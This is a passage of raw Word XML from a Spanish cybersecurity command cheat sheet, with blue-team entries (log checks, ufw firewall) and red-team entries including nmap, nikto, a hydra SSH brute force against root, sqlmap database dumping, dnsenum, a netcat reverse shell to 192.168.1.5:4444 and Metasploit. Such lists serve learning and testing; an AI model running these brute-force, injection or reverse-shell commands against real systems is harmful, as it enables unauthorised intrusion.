      </w:r>
    </w:p>
    <w:p w14:paraId="68F209CB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hash cracking avanzado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286EA8B5" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve">(Si quieres, te desarrollo estos con herramientas concretas tipo Hydra, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t>, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384AFA2D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4BD9A560">
          <v:rect id="_x0000_i1078" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6C62B2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🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> BLOQUE 4: BLUE TEAM (61–80)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C13120A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="77AA3ED5">
          <v:rect id="_x0000_i1079" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A7FF7F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61. Ver logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B895F15" w14:textId="1348E171" w:rsidR="0091094C" w:rsidRPr="00206562" w:rsidRDefault="0091094C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6DFD7A46" wp14:editId="7C6791DE">
            <wp:extent cx="5400040" cy="3873500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2023365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655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7A55" w14:textId="77777777" w:rsidR="00206562" w:rsidRP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var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t>/log/auth.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBF0EDB" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="59396990">
          <v:rect id="_x0000_i1080" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A9CAB0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62. Buscar intentos fallidos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E07A67D" w14:textId="53752A3D" w:rsidR="0091094C" w:rsidRDefault="0091094C" w:rsidP="0020656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AD77585" wp14:editId="3185B6F6">
            <wp:extent cx="5400040" cy="3975100"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1118585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853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4D53" w14:textId="77777777" w:rsidR="0091094C" w:rsidRPr="00206562" w:rsidRDefault="0091094C" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD1A7B1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>grep "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>Failed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t>" /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t>/log/auth.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1AFE67" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="0A93A0A4">
          <v:rect id="_x0000_i1081" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="399E8BBC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63. Ver conexiones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B266AF" w14:textId="3BF92F10" w:rsidR="0091094C" w:rsidRPr="00206562" w:rsidRDefault="0091094C" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091094C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="618F40AB" wp14:editId="7848AE8D">
            <wp:extent cx="5400040" cy="1598930"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="2017528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287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8EBB" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>ss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>tunap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="106750D6" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5C86798F">
          <v:rect id="_x0000_i1082" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6694DE5B" w14:textId="77777777" w:rsid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64. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Instalar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F5D91A" w14:textId="01446D2F" w:rsidR="0091094C" w:rsidRPr="00206562" w:rsidRDefault="0091094C" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091094C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="391D4711" wp14:editId="313C2D6A">
            <wp:extent cx="5400040" cy="1247775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="142163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31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473C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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C70C480" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2DF255D1">
          <v:rect id="_x0000_i1083" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2F5E82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65. Activar firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCEB856" w14:textId="6E735A31" w:rsidR="0091094C" w:rsidRPr="00206562" w:rsidRDefault="0091094C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5A57EF67" wp14:editId="7A8827F1">
            <wp:extent cx="4000500" cy="790575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="65264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472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6C61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enable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34CFA632" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="44D2F7DC">
          <v:rect id="_x0000_i1084" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D27A7CE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66. Permitir SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FFC864" w14:textId="0D51D977" w:rsidR="0091094C" w:rsidRPr="00206562" w:rsidRDefault="0091094C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18105C5C" wp14:editId="46B3FCC1">
            <wp:extent cx="2228850" cy="866775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1397331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3100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42EF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allow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DD8E09" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="6C7B90F4">
          <v:rect id="_x0000_i1085" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9EC67D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67. Bloquear puerto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A96E0C" w14:textId="760AC404" w:rsidR="0091094C" w:rsidRDefault="0091094C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160ED381" wp14:editId="51D4ADB1">
            <wp:extent cx="1800225" cy="781050"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="152578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852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9307" w14:textId="77777777" w:rsidR="0091094C" w:rsidRPr="00206562" w:rsidRDefault="0091094C" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59316D5E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deny</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> 23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583DA5AF" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5B74DF45">
          <v:rect id="_x0000_i1086" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="500A120D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68. Estado firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F343E79" w14:textId="111BCEAE" w:rsidR="0091094C" w:rsidRPr="00206562" w:rsidRDefault="0091094C" w:rsidP="0020656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D4AD3E" wp14:editId="64072107">
            <wp:extent cx="4248150" cy="1838325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1052490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9031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50A5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status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56198E33" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2DA63302">
          <v:rect id="_x0000_i1087" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D712693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69. Monitorizar procesos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0E5A73" w14:textId="1519D4D2" w:rsidR="0091094C" w:rsidRPr="00206562" w:rsidRDefault="0091094C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69A91D07" wp14:editId="56268008">
            <wp:extent cx="5400040" cy="4400550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="400257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5764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AC64" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349F741C" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5BFF9E81">
          <v:rect id="_x0000_i1088" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="643632B5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70. Alternativa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E1672A" w14:textId="2409C927" w:rsidR="0091094C" w:rsidRPr="00206562" w:rsidRDefault="0091094C" w:rsidP="0020656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BB76DCB" wp14:editId="56FBE27B">
            <wp:extent cx="5210175" cy="1038225"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1585879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7924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3D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¡</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E44301C" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>htop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68F65A4A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="78709F57">
          <v:rect id="_x0000_i1089" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF2CAF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71–80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7660FF6E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fail2ban</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0234046B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auditoría de logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209A2E40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detección intrusos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ED1BA0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permisos sospechosos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0449B9D2" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>rootkits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> básicos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6A67F6" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="139DBCB4">
          <v:rect id="_x0000_i1090" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C230475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🔴</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> BLOQUE 5: RED TEAM / PENTESTING (81–100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466EF045" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="255CEEAE">
          <v:rect id="_x0000_i1091" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="290452E5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81. Escaneo completo objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E10962F" w14:textId="71F5D7C4" w:rsidR="007123D4" w:rsidRPr="00206562" w:rsidRDefault="007123D4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7F638185" wp14:editId="0CFEBBA7">
            <wp:extent cx="5400040" cy="932180"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1774414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1408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EE24" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -A -T4 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D78917B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="793D3FE8">
          <v:rect id="_x0000_i1092" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6571CA36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82. Enumeración web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5922713E" w14:textId="5B09C9AD" w:rsidR="007123D4" w:rsidRPr="00206562" w:rsidRDefault="007123D4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218AE52A" wp14:editId="2D7FC3D6">
            <wp:extent cx="5400040" cy="795655"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="937973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7351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721A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -h http://192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70912C47" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="3DC9980C">
          <v:rect id="_x0000_i1093" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5CA206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83. Fuerza bruta SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F24B9B9" w14:textId="6453E03D" w:rsidR="007123D4" w:rsidRPr="00206562" w:rsidRDefault="007123D4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00CE5FCD" wp14:editId="733051FF">
            <wp:extent cx="5400040" cy="812800"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1761823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2305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67F7" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -P rockyou.txt ssh://192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686159E0" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="79DAEC6E">
          <v:rect id="_x0000_i1094" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C1DCD5" w14:textId="77777777" w:rsid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84. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="221DE5B7" w14:textId="03AA0EE7" w:rsidR="007123D4" w:rsidRPr="00206562" w:rsidRDefault="007123D4" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007123D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E0A649F" wp14:editId="15CA2DF9">
            <wp:extent cx="5400040" cy="1552575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1931882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8289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DE41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sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u "http://site.com?id=1" --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="02F8154B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5EAD43A0">
          <v:rect id="_x0000_i1095" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0255A223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85. Escaneo subdominios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEED589" w14:textId="734D78C7" w:rsidR="007123D4" w:rsidRPr="00206562" w:rsidRDefault="007123D4" w:rsidP="0020656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1F6A58" wp14:editId="424FDEEB">
            <wp:extent cx="5400040" cy="4427855"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1925244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4404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BB8F" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>dnsenum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> dominio.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DD392F" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="38084125">
          <v:rect id="_x0000_i1096" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E782E9" w14:textId="77777777" w:rsid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86. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465C136C" w14:textId="19A8666C" w:rsidR="007123D4" w:rsidRPr="00206562" w:rsidRDefault="007123D4" w:rsidP="00206562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6C6E0444" wp14:editId="53A68609">
            <wp:extent cx="4095750" cy="733425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1594186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869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FF62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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e /bin/bash 192.168.1.5 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49732B2B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2FB7F120">
          <v:rect id="_x0000_i1097" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="624BDEEB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87. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Listener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A7ED22F" w14:textId="7F6B3E6F" w:rsidR="007123D4" w:rsidRPr="00206562" w:rsidRDefault="007123D4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5047132C" wp14:editId="51B759B9">
            <wp:extent cx="2867025" cy="685800"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="2005593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9332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D675" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spell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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75370E5B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="3EAA1372">
          <v:rect id="_x0000_i1098" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2EC0AD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88. Explotación básica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794242B8" w14:textId="1DE73FF0" w:rsidR="007123D4" w:rsidRDefault="00E51EDA" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B8C9A1A" wp14:editId="5391E79C">
            <wp:extent cx="5400040" cy="5347970"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="383138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3800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886E" w14:textId="77777777" w:rsidR="007123D4" w:rsidRPr="00206562" w:rsidRDefault="007123D4" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08A2A45D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62882C65" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D1C09C4" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="1DB8C672">
